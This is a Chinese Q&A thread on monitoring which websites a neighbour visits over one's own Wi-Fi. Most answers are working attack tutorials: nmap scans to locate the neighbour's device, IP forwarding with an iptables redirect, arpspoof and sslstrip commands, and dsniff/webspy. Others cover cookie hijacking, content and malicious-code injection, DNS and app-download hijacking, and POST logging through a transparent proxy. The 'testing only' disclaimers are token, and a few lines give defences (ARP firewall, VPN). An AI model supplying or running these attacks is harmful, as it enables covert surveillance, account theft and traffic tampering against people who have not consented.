怎麼知道鄰居用我家的wifi登陸了哪些網站?
所有回答僅供網路滲透安全測試使用,嚴禁非法獲取或篡改他人信息.。
相關問題:透過公共 Wi-Fi 熱點上網可能會面臨哪些安全風險?如何保障安全?相關問題:無線路由器被蹭網後,有被黑的風險嗎?
恩
僅供網路滲透安全測試使用,嚴禁非法獲取或篡改他人信息,解決方案見結尾給你介紹個神奇的APP
zanti(需要root+busybox)找到鄰居家的電腦
啟用 ZpackertEditor 然後不僅可以查看對方訪問的網頁,還可以...
重定向特定網站到404啊把網頁圖片都換換啊
插點小廣告啊
替換圖片啊
插個音樂iframe框架自動播放大小0x0啊查看對方密碼、發的圖片啊
很傻瓜化的,美中不足的就是需要root+busybox了
新增:genymotion 這個不用註冊,第一個連接不上可以試試如果沒root的話,請先收藏找到了告訴你們~原理?怎麼破呢?
下載arp防火牆MAC綁定使用VPN不隨便蹭別人家網以下教程基於Kali Linux https://www.kali.org/請不要將本回答所提到的工具用於非法用途
1.
掃描網路內用戶 - Nmap
首先假定你的鄰居已經連上了你家Wi-Fi,如果想要查看他瀏覽的內容,你需要先定位到哪一個設備是你的鄰居。MAC地址和IP地址的話從路由器設置的頁面就可以看到,如果還想查看更多信息的話,Nmap是一款非常實用的工具。
首先獲得路由器網關的地址,如圖所示我家Wi-Fi的路由器地址是192.168.0.1
route –n
然後用Nmap掃描連接到該網路下的所有設備,圖裡192.168.0.109就是我用來模擬鄰居的另一台筆記本。不光IP和MAC地址可以顯示,相應的設備信息(比如圖中這個Huawei Technologies),用了什麼什麼操作系統(OS
details)都可以在nmap掃描的結果中看到。記好鄰居的IP和你路由器的地址,我們接下來要用到。
nmap -sS -O 192.168.0.1/24
2.
中間人攻擊 – arpspoof sslstrip
所謂中間人攻擊(MitM)指的是攻擊者插入到正在交流的雙方中間,竊取並修改其中的通信,而雙方仍然認為自己正和對方一對一的直接交流。
剛才有人說到現在很多網站用的都是HTTPS而不是HTTP,所以信息會被加密無法破解。那麼首先什麼是HTTP和HTTPS呢,我們可以簡單的理解為兩種網路通信時的協議,區別是HTTPS要比HTTP安全的多。的確HTTPS的信息很難破解,但是這不意味著我們面對HTTPS毫無辦法。
sslstrip 這個工具可以把我們無法破解的HTTPS請求轉換成HTTP請求。如圖所示受害者想要通過HTTPS連接一個網站,arpspoof(待會兒會提到)這個工具可以讓我的電腦偽裝成路由器的樣子,於是路由器會把收到的HTTPS請求轉發給我的電腦。這時我用sslstrip把HTTPS請求轉換成HTTP請求,再發回給路由器,路由器會緊跟著把HTTP請求轉發給目標網站。目標網站收到HTTP請求後就和受害者建立了HTTP而不是HTTPS請求。
接下來是具體操作:
首先用這兩條命令開啟IP轉發並建一個iptables rule 來讓本機可以轉發消息。
echo 1 &>
/proc/sys/net/ipv4/ip_forward
iptables -t nat -A
PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
接下來arpspoof可以把目標設備的網路通信轉發給我,interface用來指明你想用哪個網路介面,這個可以用ifconfig命令看到.
arpspoof -i interface -t target IP -r gateway IP
target IP和gateway IP我們在之前已經獲得了,於是我實際輸入的指令是:
arpspoof -i wlan0 -t
192.168.0.109 -r 192.168.0.1
可以看到arpspoof已經開始工作,保持這個窗口開啟,然後打開一個新的終端啟動sslstrip
sslstrip -l 8080
這時鄰居在這個網路下所做的事情就都記錄在sslstrip的日誌文件里了
cat sslstrip.log
收工。
參考文獻
F. Callegati, W. Cerroni, M. Ramilli, Man-in-the-Middle Attack to the HTTPS Protocol, IEEE Security Privacy, pp. 78-81, 2009.
V. Kumkar, A. Gupta, S. Shrawne, a Tiwari, and P. Tiwari, Vulnerabilities of Wireless Security Protocols (WEP and WPA2), Int. J. Adv. Res. Comput. Eng. Technol., vol. 1, no. 2, pp. 34C38, 2012.
C. Haralson, 」How To: Use SSLstrip On Kali Linux」, YouTube, 2016. [Online]. Available: https://www.youtube.com/watch?v=OtO92bL6pYE. [Accessed: 17- Apr- 2016].
只能看到一些普通的網站信息,盜銀行卡之類的,是非常難實現的。因為,現在很多網站都是https。這裡的s就是security 安全的意思。
當使用https 的時候,像上面那個兄弟,用這種man in the middle 攻擊是沒意義的。因為,https 客戶端和伺服器之間會把信息加密並相互認證,你是破譯不了中間的密碼的。如果你能,那你肯定是藍翔畢業的,清華都破解不了。
在10年前,區域網裡面很多人這麼玩,聚生網管之類的,都是靠arp欺騙來做一些事情。不過,也就只能盜個qq,或者傳奇。
限制網速,或者把他踢下線可以做到的。
如果只是問題的答案,我有一個普通的,叫天易成網路管理軟體(唉,拿不到廣告費也是苦),百度可以搜索的到,我用好幾年了,現在不用了,因為網路夠大了,不怕大家搶。主要功能其實是限制區域網里他人的網速的。然後可以查看每個人訪問哪些網站,登陸的QQ號多少(密碼看不到),然後跟哪些QQ號聊天等,還可以限制別人訪問哪些網站。這一切是免費的,但有數量限制。付費版功能應該很牛b,但我沒用過,只能幫他們打廣告來彌補他們了。
簡單簡單有一個叫做 dsniff 的工具包,就是專門用來做各種網路嗅探的。這個工具包的作者寫這套軟體的目的就是為了告訴人們自己賴以生存的網路環境是多麼的不安全=) 這一整套的工具可以幫助你偷偷摸摸地獲取到一系列的有趣信息(請遵守當地法律),比如說密碼、電郵、文件啥的。注意:請不要將本回答所提到的工具用於非法用途當然,如果要監控指定的某一台設備,首先得獲取它的IP地址,用一般的掃描工具(比如nmap)
sudo nmap -sV -T4 -O -F --version-light 192.168.1.1-255
就拿我的手機舉例吧,也就是上面的192.168.1.104
首先用 arpspoof 定向流量到本機sudo arpspoof -t 192.168.1.104 192.168.1.1
在另一個終端輸入
sudo arpspoof -t 192.168.1.1 192.168.1.104
第一個命令發送arp包給手機(192.168.1.104),告訴手機這台電腦才是網關
第二個命令發送arp包給網關(192.168.1.1),告訴網關這台電腦才是手機記得打開ip轉發,這樣系統才會把流量轉發給真正的網關,不然的話就是斷網而不是竊取流量了。=) OS X:sysctl -w net.inet.ip.forwarding=1
Linux:
echo 1 &> /proc/sys/net/ipv4/ip_forward
再過濾一下http,所有正在瀏覽的網頁就都出來了。
dsniff里另外一個工具叫 websniff,配合 arpspoof 使用可以實時在本地瀏覽器上顯示在目標設備上打開著的網頁。很簡單的一行命令就行sudo webspy 192.168.1.104
在OS X下因為XQuartz的原因不能正常使用,所以就不截圖了。
要再專業一點的話,那就直接上 KALI 吧:Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution
這個很簡單,中間人攻擊
環境:
Kali2.0 vmRtl8187L外置網卡由於是你自己的wifi、那麼完全不需要考慮破解wifiBettercap1.5.2如果你想登錄他的網站賬號,還可以準備一個cookies替換工具,在火狐瀏覽器有插件,也包括菜刀、k8飛刀等工具我是如何劫持北京麗都皇冠酒店區域網的前陣子受邀參加補天年度頒獎典禮時在360幫定的酒店錄製的。文章詳情http://bbs.sssie.com/thread-1327-1-1.html前幾天住酒店,閑著無聊進酒店的公共wifi後台逛了一逛,發覺有題主所需要的功能:
路由用的是一個叫某快的產品:有網址瀏覽記錄功能:
還有QQ登錄記錄功能: 要是普通的無線路由,那就自己開台主機arp欺騙後抓包吧( ′???` ) 要是路由器能刷Pandorabox,也可以在裡面抓在安全需求較高的場景下怕受到中間人攻擊的話,可以使用安全的 VPN 連接到網路上。
另外,排名第一的通過 ARP 欺騙來實現中間人攻擊的套路目測成功率比較低,大多數設備上可能都會安裝了防火牆軟體。
更直接的中間人攻擊(通過物理中間件)會成功率指數上升。看完回答我覺得我隔壁鄰居的兒子要給我跪下了……
用wireshark抓包分析。
對了,還能抓出你鄰居的QQ號。總感覺是題主想查自個男朋友上了啥網址
沒有人說路由器的方案。
我建議使用路由器來獲取信息。網關採用OpenWrt或者其他能跑軟體的路由器;
安裝Squid或者一些透明代理軟體;使用iptables,將指定來源IP的流量統統轉發到透明代理上;透明代理可以通過日誌記錄訪問的地址,Cookie,甚至POST的內容等。另外,篡改內容,插入惡意代碼,劫持安卓手機下載的App,劫持DNS也是非常簡單的事情。
最後,https降級攻擊有朋友提過了。
以上僅是技術探討,本人不承擔任何責任。Wireshark可以抓抓包 看看鄰居都喜歡看什麼圖圖ˊ_&>ˋ
第一個人推薦的我就不說了,我就推薦一個普通的,雖然比zanti差點。但是zanti是要註冊的。而且很多破解版也不安全。我就發一個開源的吧。但是基本功能類似,名字叫dsploit謝謝評論區提醒,現在改版了叫csploit
簡單的arp欺騙,中間人攻擊~可以盜號哦( ?° ?? ?°)。https的話~可以劫持域名~
哈哈哈哈哈哈哈,其實是題主偷用鄰居的wifi然後怕鄰居知道自己上過哪些網站。問這個問題的目的就是評估鄰居欲知自己上過哪些網站的難易程度以及概率。
真相只有一個!
你們都不怕這是個釣魚問題么。。。。。
我家的密碼是123456789。。。。。。我爸設的。我說搞個複雜點的嘛,別被人家蹭網。他說這麼複雜幹嘛,人家跟你說要用你家的網,你能不把密碼告訴他嗎?我竟無言以對。。。。。。
以下是最簡單最準確的方法
1.去他家2.打開他電腦3.打開瀏覽器 Ctrl+H我怎麼覺得你是想獲取你女朋友/男朋友登陸的網站
推薦閱讀:
※阿里雲活動《消失的三重密碼》?
※我爸在4月27號到30號之間沒有收到任何信息,農行卡內錢在這段期間被轉走13萬多!我該怎麼做?
※密碼生產器的意義何在?
※怎樣防止第三方軟體竊取用戶密碼?
※QQ郵箱為什麼默認不顯示未知郵件的圖片?顯示圖片對郵箱安全有什麼隱患?